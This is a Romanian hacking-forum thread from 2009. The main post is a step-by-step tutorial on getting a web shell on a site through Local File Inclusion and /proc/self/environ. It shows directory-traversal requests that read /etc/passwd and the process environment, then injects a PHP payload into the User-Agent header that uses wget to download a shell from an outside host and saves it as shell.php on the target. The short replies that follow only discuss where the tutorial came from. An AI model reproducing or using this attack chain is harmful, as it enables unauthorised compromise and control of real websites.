ZeroCold Posted September 26, 2009 Report Posted September 26, 2009 (edited) Shell prin LFI - metoda proc/self/environ 1 - Introducere2 - Descoperire LFI3 - Verificam daca proc/self/environ e accesibil4 - Injectare cod malitios5 - Acces la shell6 - Multumiri>> 1 - IntroducereIn acestu tutorial va voi arata cum sa obtineti un shell pe un site folosindu-va de Local File Inclusion siinjectand cod malitios in proc/self/environ.Este un tutorial care explica totul pas cu pas.>> 2 - Descoperire LFI- Acum sa gasim o un site vulnerabil la Local File Inclusion.Am gasit tinta,sa verificamwww.website.com/view.php?page=contact.php- Acum sa inlocuim contact.php cu ../ si URL-ul va deveniiwww.website.com/view.php?page=../si avem o eroare. Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337sanse mari sa avem o vulnerabilitate de tip Local File Inclusion.Sa trecem mai departe.- Sa verificam daca putem accesa etc/passwd ca sa vedem daca este vulnerabil la Local File Inclusion.Sa face un request : www.website.com/view.php?page=../../../etc/passwdavem o eroare si fisierul etc/passwd nu este inclus.Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337urcam cateva directoriiwww.website.com/view.php?page=../../../../../etc/passwdam inclus cu succes fisierul etc/passwd.root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin>> 3 - Verificam daca proc/self/environ e accesibil- Acum sa vedem daca proc/self/environ este accesibil.O sa inlocuim etc/passwd cu proc/self/environ www.website.com/view.php?page=../../../...lf/environDaca primiti ceva de genul DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80proc/self/environ este accesibil.Daca primiti o pagina alba,o eroare inseamna ca nu este accesibil sau sistemul de operare este FreeBSD.>> 4 - Injectare cod malitios- Acum sa injectam codul nostru malitios in proc/self/environ.Cum putem face asta?Injectam codul in HTTP Header-ul User-Agent.Folositi addon-ul Tamper Data pentru Firefox pentru a schimba User-Agent-ul.Porniti Tamper Data si faceti un request la URL-ul :www.website.com/view.php?page=../../../ ... lf/environAlegeti Tamper si in campul User-Agent scrieti urmatorul cod :<?system('wget hack-bay.com -O shell.php');?>Apoi dati submit la request.Comanda noastra va fi executata(o sa descarce un shell txt de la adresa http://hack-bay.com/Shells/gny.txt]hack-bay.com si il va salva ca shell.php in directorul site-ului) prin intermediul functiei system(),si shell-ul nostru va fi creat.Daca nu merge,incercati exec() pentru ca system() poate fi restrictionat pe server din php.ini>> 5 - Acces la shell- Acuma sa verificam daca codul nostru malitios a fost injectat cu succes.Sa vedem daca shell-ul este prezent.www.website.com/shell.phpShell-ul nostru este acolo.Injectia a fost efectuata cu succes.Sursa: insecurity.ro ; Author: SirGod Edited September 26, 2009 by ZeroCold Quote
Guest Praetorian Posted September 26, 2009 Report Posted September 26, 2009 Foarte simplu.. ma duc sa imi i-au o paine! Quote
Adso Posted September 26, 2009 Report Posted September 26, 2009 http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rst Quote
dRuNNNk Posted September 26, 2009 Report Posted September 26, 2009 l-am mai vazut pe rst oricum e facut de sirgod Quote
Adso Posted September 26, 2009 Report Posted September 26, 2009 l-am mai vazut pe rst oricum e facut de sirgodreply de 2 lei, nu ai sp nik defapt ai repetat ce am pus eu si sursa lui! Quote
dRuNNNk Posted September 26, 2009 Report Posted September 26, 2009 scuze nu m-am uitat ca ai scris si tu Quote
ZeroCold Posted September 26, 2009 Author Report Posted September 26, 2009 http://rstcenter.com/forum/16425-shell-prin-lfi-metoda-proc-self-environ.rstpe ala nu l-am vazut, da oricum se observa mai asta de aici. si...da, e facut de sirgod, am pus las sfarsit autor si sursa Quote
